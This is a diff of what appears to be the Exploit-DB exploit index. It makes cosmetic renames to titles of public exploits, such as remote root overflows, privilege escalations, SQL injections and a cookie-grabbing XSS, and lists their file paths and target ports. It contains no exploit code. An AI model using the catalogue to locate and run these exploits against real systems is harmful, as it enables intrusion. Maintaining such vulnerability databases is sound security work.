Service",2004-06-25,lorenzo,linux,dos,0 -307,platforms/linux/remote/307.py,"rlpr 2.04 - msg() Remote Format String",2004-06-25,jaguar,linux,remote,7290 +307,platforms/linux/remote/307.py,"Rlpr 2.04 - msg() Remote Format String",2004-06-25,jaguar,linux,remote,7290 308,platforms/linux/remote/308.c,"MPlayer 1.0pre4 GUI - Filename handling Overflow",2004-07-04,c0ntex,linux,remote,0 309,platforms/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code Injection",2004-07-04,"Nasir Simbolon",php,webapps,0 310,platforms/windows/remote/310.txt,"Microsoft Internet Explorer - Remote Application.Shell Exploit",2004-07-09,Jelmer,windows,remote,0 @@ -308,16 +308,16 @@ id,file,description,date,author,platform,type,port 329,platforms/windows/dos/329.txt,"Microsoft Windows NT - Crash with an Extra Long 'Username' Denial of Service",1997-04-01,Fyodor,windows,dos,0 330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp and lpsched - Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0 331,platforms/linux/local/331.c,"LibXt - XtAppInitialize() Overflow *xterm Exploit",1997-05-14,"Ming Zhang",linux,local,0 -332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps & chkey - Data Buffer Exploit",1997-05-19,"Joe Zbiciak",solaris,local,0 +332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer Exploit",1997-05-19,"Joe Zbiciak",solaris,local,0 333,platforms/aix/local/333.c,"AIX 4.2 - /usr/dt/bin/dtterm Local Buffer Overflow",1997-05-27,"Georgi Guninski",aix,local,0 -334,platforms/irix/local/334.c,"IRIX - Multiple Buffer Overflows (LsD)",1997-05-25,LSD-PLaNET,irix,local,0 +334,platforms/irix/local/334.c,"SGI IRIX - Multiple Buffer Overflows (LsD)",1997-05-25,LSD-PLaNET,irix,local,0 335,platforms/aix/local/335.c,"AIX lquerylv - Buffer Overflow Privilege Escalation",1997-05-26,"Georgi Guninski",aix,local,0 -336,platforms/irix/local/336.c,"IRIX - /bin/login Local Buffer Overflow",1997-05-26,"David Hedley",irix,local,0 +336,platforms/irix/local/336.c,"SGI IRIX - /bin/login Local Buffer Overflow",1997-05-26,"David Hedley",irix,local,0 337,platforms/irix/local/337.c,"IRIX 5.3 - /usr/sbin/iwsh Buffer Overflow Privilege Escalation",1997-05-27,"David Hedley",irix,local,0 338,platforms/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 - xterm (-xrm) Privilege Escalation",1997-05-28,"David Hedley",solaris,local,0 339,platforms/linux/local/339.c,"zgv - '$HOME' Buffer Overflow",1997-06-20,"BeastMaster V",linux,local,0 340,platforms/linux/remote/340.c,"Linux imapd - Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143 -341,platforms/solaris/local/341.c,"Solaris 2.4 - passwd & yppasswd & nispasswd Overflows",1997-07-12,"Cristian Schipor",solaris,local,0 +341,platforms/solaris/local/341.c,"Solaris 2.4 passwd / yppasswd / nispasswd - Overflows",1997-07-12,"Cristian Schipor",solaris,local,0 343,platforms/bsd/dos/343.c,"TCP SYN - 'bang.c' Denial of Service",2002-09-17,Nebunu,bsd,dos,0 345,platforms/windows/dos/345.c,"UDP Stress Tester - Denial of Service",2002-09-10,Cys,windows,dos,0 346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Root Exploit",2001-12-20,Teso,linux,remote,23 @@ -351,7 +351,7 @@ id,file,description,date,author,platform,type,port 374,platforms/linux/local/374.c,"SoX - '.wav' Local Buffer Overflow",2004-08-04,Rave,linux,local,0 375,platforms/linux/local/375.c,"Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure",2004-08-04,"Paul Starzetz",linux,local,0 376,platforms/windows/dos/376.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash",2004-08-04,anonymous,windows,dos,0 -378,platforms/windows/remote/378.pl,"BlackJumboDog - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21 +378,platforms/windows/remote/378.pl,"BlackJumboDog FTP Server - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21 379,platforms/linux/remote/379.txt,"CVSTrac - Arbitrary Code Execution",2004-08-06,anonymous,linux,remote,0 380,platforms/linux/remote/380.c,"Pavuk Digest - Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80 381,platforms/windows/local/381.c,"Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0 @@ -361,7 +361,7 @@ id,file,description,date,author,platform,type,port 385,platforms/windows/dos/385.c,"Microsoft Messenger (Linux) - Denial of Service (MS03-043)",2004-08-08,VeNoMouS,windows,dos,0 386,platforms/linux/remote/386.c,"xine 0.99.2 - Remote Stack Overflow",2004-08-09,c0ntex,linux,remote,80 387,platforms/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Root Exploit",2004-08-09,livenn,linux,remote,22 -388,platforms/windows/local/388.c,"Ollydbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0 +388,platforms/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0 389,platforms/linux/remote/389.c,"LibPNG Graphics Library - Remote Buffer Overflow",2004-08-11,infamous41md,linux,remote,0 390,platforms/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow (1)",2004-08-13,infamous41md,linux,remote,0 391,platforms/osx/remote/391.pl,"Apple Mac OSX 10.3.3 - AppleFileServer Remote Root Overflow",2004-08-13,"Dino Dai Zovi",osx,remote,548 @@ -385,7 +385,7 @@ id,file,description,date,author,platform,type,port 411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Exploit",2001-01-01,sd,linux,local,0 413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0 -417,platforms/linux/local/417.c,"SquirrelMail - (chpasswd) Privilege Escalation (Brute Force Exploit)",2004-08-25,Bytes,linux,local,0 +417,platforms/linux/local/417.c,"SquirrelMail - 'chpasswd' Privilege Escalation (Brute Force Exploit)",2004-08-25,Bytes,linux,local,0 418,platforms/windows/remote/418.c,"Winamp 5.04 - Skin File (.wsz) Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0 419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server - Multiple Connections Denial of Service",2004-08-26,"GulfTech Security",windows,dos,0 420,platforms/win_x86/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win_x86,dos,0 @@ -406,7 +406,7 @@ id,file,description,date,author,platform,type,port 435,platforms/windows/remote/435.c,"Trillian 0.74i MSN Module - Remote Buffer Overflow",2004-09-08,Komrade,windows,remote,0 436,platforms/php/webapps/436.txt,"PHP-Nuke 7.4 - Privilege Escalation",2004-09-08,mantra,php,webapps,0 437,platforms/linux/remote/437.c,"Citadel/UX 6.23 - Remote USER Directive Exploit",2004-09-09,Nebunu,linux,remote,504 -438,platforms/linux/local/438.c,"CDRecord - '$RSH' exec() SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 +438,platforms/linux/local/438.c,"CDRecord's ReadCD - '$RSH' exec() SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 439,platforms/windows/remote/439.c,"BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow",2004-09-12,Delikon,windows,remote,21 463,platforms/windows/dos/463.c,"Serv-U FTP Server < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0 464,platforms/cgi/webapps/464.txt,"Turbo Seek - Null Byte Error Discloses Files",2004-09-13,durito,cgi,webapps,0 @@ -417,7 +417,7 @@ id,file,description,date,author,platform,type,port 470,platforms/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission Exploit",2004-09-21,"Angelo Rosiello",linux,local,0 471,platforms/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service",2004-09-21,"GulfTech Security",windows,dos,66 472,platforms/windows/remote/472.c,"Microsoft Windows - JPEG GDI+ Overflow Shellcode Exploit",2004-09-22,FoToZ,windows,remote,0 -473,platforms/windows/remote/473.c,"MDaemon 6.5.1 - IMAP/SMTP Remote Buffer Overflow",2004-09-22,D_BuG,windows,remote,143 +473,platforms/windows/remote/473.c,"Alt-N MDaemon 6.5.1 - IMAP/SMTP Remote Buffer Overflow",2004-09-22,D_BuG,windows,remote,143 474,platforms/windows/dos/474.sh,"Microsoft Windows - JPEG Processing Buffer Overrun Exploit (MS04-028)",2004-09-22,perplexy,windows,dos,0 475,platforms/windows/remote/475.sh,"Microsoft Windows - JPEG GDI+ Overflow Administrator Exploit (MS04-028)",2004-09-23,"Elia Florio",windows,remote,0 476,platforms/linux/local/476.c,"glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow (PoC)",2004-09-23,CoKi,linux,local,0 @@ -425,11 +425,11 @@ id,file,description,date,author,platform,type,port 478,platforms/windows/remote/478.c,"Microsoft Windows - JPEG GDI+ Overflow Download Shellcode Exploit (MS04-028)",2004-09-25,ATmaCA,windows,remote,0 479,platforms/linux/local/479.c,"GNU Sharutils 4.2.1 - Local Format String (PoC)",2004-09-25,n4rk0tix,linux,local,0 480,platforms/windows/remote/480.c,"Microsoft Windows - JPEG GDI+ Remote Heap Overflow (MS04-028)",2004-09-25,"John Bissell",windows,remote,0 -482,platforms/hp-ux/local/482.c,"HP-UX 11.0/11.11 swxxx - Privilege Escalation",2002-12-11,watercloud,hp-ux,local,0 +482,platforms/hp-ux/local/482.c,"HP-UX 11.0/11.11 - swxxx Privilege Escalation",2002-12-11,watercloud,hp-ux,local,0 551,platforms/linux/dos/551.c,"MyServer 0.7.1 - (POST) Denial of Service",2004-09-27,"Tom Ferris",linux,dos,0 556,platforms/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ All-in-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,windows,remote,0 558,platforms/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow",2004-09-28,ATmaCA,windows,local,0 -559,platforms/windows/local/559.c,"Zinf 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local,0 +559,platforms/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local,0 560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros (.mcr) Local",2004-09-28,ATmaCA,windows,local,0 561,platforms/php/webapps/561.sh,"Serendipity 0.7-beta1 - SQL Injection (PoC)",2004-09-28,aCiDBiTS,php,webapps,0 562,platforms/windows/dos/562.c,"MSSQL 7.0 - Remote Denial of Service",2004-09-29,"securma massine",windows,dos,0 @@ -454,12 +454,12 @@ id,file,description,date,author,platform,type,port 587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0 588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21 589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers - Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0 -590,platforms/windows/remote/590.c,"ShixxNote 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000 +590,platforms/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000 591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String (not setuid)",2004-10-23,CoKi,linux,local,0 592,platforms/windows/remote/592.py,"Ability Server 2.34 - (APPE) Remote Buffer Overflow",2004-10-23,KaGra,windows,remote,21 593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 FTP Server - Remote Denial of Service",2004-10-24,KaGra,windows,dos,0 594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 - POP3/SMTP Remote Denial of Service",2004-10-24,KaGra,windows,dos,0 -598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow",2004-10-26,muts,windows,remote,25 +598,platforms/windows/remote/598.py,"TABS MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow",2004-10-26,muts,windows,remote,25 599,platforms/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service",2004-10-26,muts,windows,dos,0 600,platforms/linux/local/600.c,"GD Graphics Library - Heap Overflow (PoC)",2004-10-26,anonymous,linux,local,0 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,linux,local,0 @@ -490,8 +490,8 @@ id,file,description,date,author,platform,type,port 634,platforms/windows/dos/634.pl,"Secure Network Messenger 1.4.2 - Denial of Service",2004-11-15,ClearScreen,windows,dos,0 635,platforms/php/webapps/635.txt,"miniBB - 'user' Input Validation Hole",2004-11-16,anonymous,php,webapps,0 636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow (2)",2004-11-16,NoPh0BiA,windows,remote,80 -637,platforms/windows/remote/637.c,"MailCarrier 2.51 - Remote Buffer Overflow",2004-11-16,NoPh0BiA,windows,remote,25 -638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow",2004-11-18,muts,windows,remote,110 +637,platforms/windows/remote/637.c,"TABS MailCarrier 2.51 - Remote Buffer Overflow",2004-11-16,NoPh0BiA,windows,remote,25 +638,platforms/windows/remote/638.py,"Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Buffer Overflow",2004-11-18,muts,windows,remote,110 640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0 641,platforms/windows/remote/641.txt,"Microsoft Internet Explorer 6.0 SP2 - File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0 642,platforms/cgi/webapps/642.pl,"TWiki 20030201 - search.pm Remote Command Execution",2004-11-20,RoMaNSoFt,cgi,webapps,0 @@ -508,16 +508,16 @@ id,file,description,date,author,platform,type,port 655,platforms/windows/dos/655.c,"Star Wars Battlefront 1.1 - Fake Players Denial of Service",2004-11-24,"Luigi Auriemma",windows,dos,0 657,platforms/linux/local/657.c,"atari800 - Privilege Escalation",2004-11-25,pi3,linux,local,0 658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP 1.52 - Remote Buffer Overflow",2004-11-25,class101,windows,remote,143 -659,platforms/cgi/webapps/659.txt,"eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",cgi,webapps,0 +659,platforms/cgi/webapps/659.txt,"Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",cgi,webapps,0 660,platforms/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager 2.2 - Denial of Service",2004-11-28,Xtiger,windows,dos,0 -663,platforms/windows/remote/663.py,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow",2004-11-29,muts,windows,remote,143 +663,platforms/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow",2004-11-29,muts,windows,remote,143 664,platforms/windows/dos/664.c,"Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow",2004-11-29,NoPh0BiA,windows,dos,0 665,platforms/windows/dos/665.c,"Orbz Game 2.10 - Remote Buffer Overflow",2004-11-29,"Luigi Auriemma",windows,dos,0 667,platforms/windows/dos/667.c,"Jana Server 2.4.4 - (http/pna) Denial of Service",2004-11-30,"Luigi Auriemma",windows,dos,0 -668,platforms/windows/remote/668.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (1)",2004-11-30,JohnH,windows,remote,143 +668,platforms/windows/remote/668.c,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (1)",2004-11-30,JohnH,windows,remote,143 669,platforms/linux/local/669.c,"Aspell (word-list-compress) - Command Line Stack Overflow",2004-12-01,c0d3r,linux,local,0 -670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143 +670,platforms/windows/remote/670.c,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143 671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0 672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0 673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0 @@ -590,12 +590,12 @@ id,file,description,date,author,platform,type,port 762,platforms/osx/dos/762.c,"Apple Mac OSX 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service",2005-01-20,nemo,osx,dos,0 763,platforms/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79 764,platforms/unix/remote/764.c,"Apache mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)",2003-04-04,spabam,unix,remote,80 -765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 +765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 766,platforms/osx/local/766.c,"Apple Mac OSX 10.3.7 - mRouter Privilege Escalation",2005-01-22,nemo,osx,local,0 767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21 769,platforms/windows/local/769.c,"Funduc Search and Replace - Compressed File Local Buffer Overflow",2005-01-24,ATmaCA,windows,local,0 770,platforms/windows/dos/770.txt,"Apple QuickTime 6.5.2.10 - '.qtif' Image Parsing",2005-01-24,ATmaCA,windows,dos,0 -771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' files handling Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0 +771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0 772,platforms/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (C)",2005-01-25,THUNDER,cgi,webapps,0 773,platforms/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl)",2005-01-25,GHC,cgi,webapps,0 774,platforms/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0 @@ -642,9 +642,9 @@ id,file,description,date,author,platform,type,port 816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)",2005-02-13,lizard,linux,local,0 817,platforms/cgi/dos/817.pl,"AWStats 6.4 - Denial of Service",2005-02-14,GHC,cgi,dos,0 818,platforms/php/webapps/818.txt,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (1)",2005-02-14,AL3NDALEEB,php,webapps,0 -819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote Buffer Overflow (French Windows OS support)",2005-02-15,"Jerome Athias",windows,remote,80 +819,platforms/windows/remote/819.py,"Savant Web Server 3.1 (French Windows OS support) - Remote Buffer Overflow",2005-02-15,"Jerome Athias",windows,remote,80 820,platforms/php/webapps/820.php,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0 -822,platforms/windows/remote/822.c,"Serv-U FTP Server 4.x - 'site chmod' Remote Buffer Overflow",2004-01-30,Skylined,windows,remote,21 +822,platforms/windows/remote/822.c,"RhinoSoft Serv-U FTPd Server 4.x - 'site chmod' Remote Buffer Overflow",2004-01-30,Skylined,windows,remote,21 823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String",2004-02-11,Skylined,windows,remote,21 824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0 825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow",2005-02-17,c0d3r,windows,remote,21 @@ -665,12 +665,12 @@ id,file,description,date,author,platform,type,port 840,platforms/cgi/webapps/840.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0 841,platforms/windows/dos/841.c,"Soldier of Fortune 2 1.03 - 'cl_guid' Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0 842,platforms/linux/dos/842.c,"WU-FTPD 2.6.2 - File Globbing Denial of Service",2005-02-25,str0ke,linux,dos,0 -843,platforms/windows/dos/843.c,"Knet 1.04c - Buffer Overflow Denial of Service",2005-02-25,CorryL,windows,dos,0 +843,platforms/windows/dos/843.c,"KNet Web Server 1.04c - Buffer Overflow Denial of Service",2005-02-25,CorryL,windows,dos,0 844,platforms/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure (asm)",2005-02-26,illwill,windows,local,0 845,platforms/windows/remote/845.c,"BadBlue 2.5 - Easy File Sharing Remote Buffer Overflow",2005-02-27,class101,windows,remote,80 846,platforms/windows/local/846.cpp,"Einstein 1.01 - Local Password Disclosure",2005-02-27,Kozan,windows,local,0 847,platforms/windows/remote/847.cpp,"BadBlue 2.55 - Web Server Remote Buffer Overflow",2005-02-27,tarako,windows,remote,80 -848,platforms/windows/local/848.asm,"Einstein 1.01 - Local Password Disclosure (asm)",2005-02-28,illwill,windows,local,0 +848,platforms/windows/local/848.asm,"Einstein 1.01 - Local Password Disclosure (ASM)",2005-02-28,illwill,windows,local,0 849,platforms/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",windows,dos,0 852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0 853,platforms/cgi/webapps/853.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit (extra)",2005-03-02,omin0us,cgi,webapps,0 @@ -683,7 +683,7 @@ id,file,description,date,author,platform,type,port 860,platforms/php/webapps/860.c,"Aztek Forum 4.0 - (myadmin.php) Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0 861,platforms/windows/dos/861.c,"Microsoft Windows 2003/XP - Remote Denial of Service",2005-03-07,RusH,windows,dos,0 862,platforms/cgi/webapps/862.txt,"The Includer CGI 1.0 - Remote Command Execution (1)",2005-03-07,"Francisco Alisson",cgi,webapps,0 -863,platforms/windows/local/863.cpp,"RealPlayer 10 - '.smil' Local Buffer Overflow",2005-03-07,nolimit,windows,local,0 +863,platforms/windows/local/863.cpp,"RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow",2005-03-07,nolimit,windows,local,0 864,platforms/php/webapps/864.txt,"phpWebLog 0.5.3 - Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 865,platforms/php/webapps/865.txt,"PHP mcNews 1.3 - (skinfile) Remote File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 866,platforms/php/webapps/866.c,"paNews 2.0b4 - Remote Admin Creation SQL Injection",2005-03-08,Silentium,php,webapps,0 @@ -691,7 +691,7 @@ id,file,description,date,author,platform,type,port 868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 869,platforms/bsd/dos/869.c,"OpenBSD 2.0 < 3.6 - TCP Timestamp Remote Denial of Service",2005-03-09,RusH,bsd,dos,0 870,platforms/php/webapps/870.txt,"Download Center Lite (DCL) 1.5 - Remote File Inclusion",2005-03-10,"Filip Groszynski",php,webapps,0 -871,platforms/php/webapps/871.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0 +871,platforms/php/webapps/871.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass",2005-03-11,Ali7,php,webapps,0 872,platforms/php/webapps/872.pl,"SocialMPN - Arbitrary File Injection",2005-03-11,y3dips,php,webapps,0 873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users",2005-03-11,Ali7,php,webapps,0 874,platforms/windows/dos/874.cpp,"Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow",2005-03-12,"Leon Juranic",windows,dos,0 @@ -878,7 +878,7 @@ id,file,description,date,author,platform,type,port 1066,platforms/windows/remote/1066.cpp,"Microsoft Outlook Express - NNTP Buffer Overflow (MS05-030)",2005-06-24,eyas,windows,remote,0 1067,platforms/windows/dos/1067.cpp,"TCP-IP Datalook 1.3 - Local Denial of Service",2005-06-25,basher13,windows,dos,0 1068,platforms/php/webapps/1068.pl,"PHP-Fusion 6.00.105 - Accessible Database Backups Download Exploit",2005-06-25,Easyex,php,webapps,0 -1069,platforms/php/webapps/1069.php,"UBB Threads < 6.5.2 Beta - (mailthread.php) SQL Injection",2005-06-25,mh_p0rtal,php,webapps,0 +1069,platforms/php/webapps/1069.php,"UBBCentral UBB.Threads < 6.5.2 Beta - (mailthread.php) SQL Injection",2005-06-25,mh_p0rtal,php,webapps,0 1070,platforms/asp/webapps/1070.pl,"ASPNuke 0.80 - (article.asp) SQL Injection",2005-06-27,mh_p0rtal,asp,webapps,0 1071,platforms/asp/webapps/1071.pl,"ASPNuke 0.80 - (comment_post.asp) SQL Injection",2005-06-27,"Alberto Trivero",asp,webapps,0 1072,platforms/multiple/dos/1072.cpp,"Stream / Raped (Windows) - Denial of Service Attack",2005-06-27,"Marco Del Percio",multiple,dos,0 @@ -887,13 +887,13 @@ id,file,description,date,author,platform,type,port 1075,platforms/windows/remote/1075.c,"Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 - (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 1077,platforms/php/webapps/1077.pl,"WordPress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",php,webapps,0 -1078,platforms/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - (xmlrpc.php) Remote Code Injection",2005-07-01,ilo--,php,webapps,0 +1078,platforms/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection",2005-07-01,ilo--,php,webapps,0 1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Exploit",2005-07-05,k-otik,windows,remote,0 1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 - (highlight) Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0 1081,platforms/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client Exploit",2005-07-03,"Kevin Finisterre",hardware,remote,0 1082,platforms/php/webapps/1082.pl,"XOOPS 2.0.11 - xmlrpc.php SQL Injection",2005-07-04,RusH,php,webapps,0 -1083,platforms/php/webapps/1083.pl,"xmlrpc.php Library 1.3.0 - Remote Command Execution (2)",2005-07-04,dukenn,php,webapps,0 -1084,platforms/php/webapps/1084.pl,"xmlrpc.php Library 1.3.0 - Remote Command Execution (3)",2005-07-04,"Mike Rifone",php,webapps,0 +1083,platforms/php/webapps/1083.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (2)",2005-07-04,dukenn,php,webapps,0 +1084,platforms/php/webapps/1084.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3)",2005-07-04,"Mike Rifone",php,webapps,0 1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 - Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0 1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure",2005-07-04,Kozan,windows,local,0 1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privilege Escalation",2005-07-04,RusH,bsd,local,0 @@ -909,7 +909,7 @@ id,file,description,date,author,platform,type,port 1097,platforms/php/webapps/1097.txt,"BlogTorrent 0.92 - Remote Password Disclosure",2005-07-11,LazyCrs,php,webapps,0 1099,platforms/windows/remote/1099.pl,"Baby Web Server 2.6.2 - Command Validation Exploit",2005-07-11,basher13,windows,remote,0 1100,platforms/windows/dos/1100.pl,"Remote File Explorer 1.0 - Denial of Service",2005-07-11,basher13,windows,dos,0 -1101,platforms/windows/dos/1101.c,"wMailServer 1.0 - Remote Denial of Service",2005-07-12,Kozan,windows,dos,0 +1101,platforms/windows/dos/1101.c,"SoftiaCom wMailServer 1.0 - Remote Denial of Service",2005-07-12,Kozan,windows,dos,0 1102,platforms/windows/remote/1102.html,"Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution",2005-07-13,"Michael Krax",windows,remote,0 1103,platforms/php/webapps/1103.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0 1104,platforms/windows/dos/1104.cpp,"Microsoft Windows - Netman Service Local Denial of Service",2005-07-14,bkbll,windows,dos,0 @@ -952,7 +952,7 @@ 